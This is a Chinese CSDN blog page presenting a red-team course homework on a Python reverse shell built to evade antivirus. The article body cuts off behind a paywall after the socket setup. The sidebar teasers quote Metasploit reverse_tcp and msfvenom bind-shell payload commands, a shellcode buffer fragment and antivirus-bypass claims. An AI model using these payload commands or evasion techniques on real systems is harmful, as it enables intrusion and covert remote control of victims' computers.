红队作业 | Python实现免杀远控

最新推荐文章于 2024-06-09 16:13:34 发布
最新推荐文章于 2024-06-09 16:13:34 发布
阅读量870 收藏 7
点赞数
文章标签: 网络 python socket java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/121710171
版权
本文介绍了如何使用Python实现一个简单的免杀远程控制功能,即反弹shell。内容涉及TCP长连接、异常处理、服务端命令执行及回显。通过netcat工具进行测试,同时探讨了代码优化和免杀的可能性,以及可能的应用场景,如配合计划任务执行和上线提醒功能。
摘要由CSDN通过智能技术生成

文章来源|MS08067 红队培训班 第4期

本文作者:学员A(红队培训班4期学员)


按老师要求尝试完成布置的作业如下:

要想实现简易远控,说的详细点就是反弹shell,首先要解决三个问题:

1.与服务端建立socket连接

2.在服务端命令执行

3.服务端把回显返回给客户端

这里我们用python实现,声明一下,涉及到的内容是网络编程,以下函数实现多半都是我百度的,所以有很多用法以及逻辑的实现都是欠考虑的QAQ

0x01 代码实现

#以下提到客户端/服务端均为相对概念
import socket
import sys
import subprocess


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#建立socket服务器,两个参数分别代表ipv4,tcp连接
最低0.47元/天 解锁文章
Ms08067安全实验室
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于Python实现socket远程木马
weixin_49472648的博客
06-16 1722
通过Python实现socket通信,实现木马功能,进而远程控制对方主机。 严正声明:本文仅限于技术讨论,严禁用于其他用途。
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
安卓免杀远控/手机免杀远控2020-零开始攻防详细教程
最新发布
2401_84915584的博客
06-09 255
远控免杀——网络人教你做到远控免杀是一种穿透内网高技术的绿色软件,能躲避杀毒软件拉截的安全软件,远控免杀软件能确实在内网信息安全,个人隐私,远控免杀让你自由管理,轻松上班
python免杀
weixin_43152809的博客
07-13 727
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1347
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
Python绝技:运用Python成为顶级黑客》 用Python实现免杀
weixin_30746117的博客
05-28 363
1、免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。 输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 查看该c文件: 接着在...
python打包的exe如何免杀_Metasploit+python生成免杀exe过360杀毒
weixin_39904116的博客
11-21 235
from ctypes import *import ctypesbuf= ""buf+= "\xbb\x7a\x62\x0a\x22\xdb\xc9\xd9\x74\x24\xf4\x58\x29"buf+= "\xc9\xb1\x97\x31\x58\x15\x03\x58\x15\x83\xe8\xfc\xe2"buf+= "\x8f\xdc\x50\xbc\x22\x5d\xbf\x0c...
红队作业 | 免杀Meterpreter java
Ms08067安全实验室
01-17 956
文章来源|MS08067 红队培训班 第5期本文作者:aeqaq(红队培训班5期学员)按老师要求尝试完成布置的作业如下:目标:分析msf meterpreter java马的原理,然后自己...
红队作业 | MSF源码级别免杀实录
Ms08067安全实验室
11-24 1420
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:对于msf生成的shellcode都是一样的。所以从代码层面来讲来说,不...
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
Ms08067安全实验室
09-01 1442
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfve...
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2938
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
python打包的exe如何免杀_CS强化_python免杀
weixin_39947314的博客
11-26 704
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启Window...
如何使用Python进行Payload免杀
11-20 703
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似...
python打包的exe如何免杀_使用Python进行防病毒免杀
weixin_39979167的博客
11-21 788
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:ht...
python打包的exe如何免杀_使用Python进行防病毒免杀解析
weixin_39984952的博客
11-21 1285
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装2、msfvenom生成Python P...
地狱修炼之路—Python远控领域!
qq_43606723的博客
08-18 323
文章内容仅用于技术交流学习,禁止用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果,均由使用者本人负责,文章作者不为此承担任何责任。基于Python网络编程。.........
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值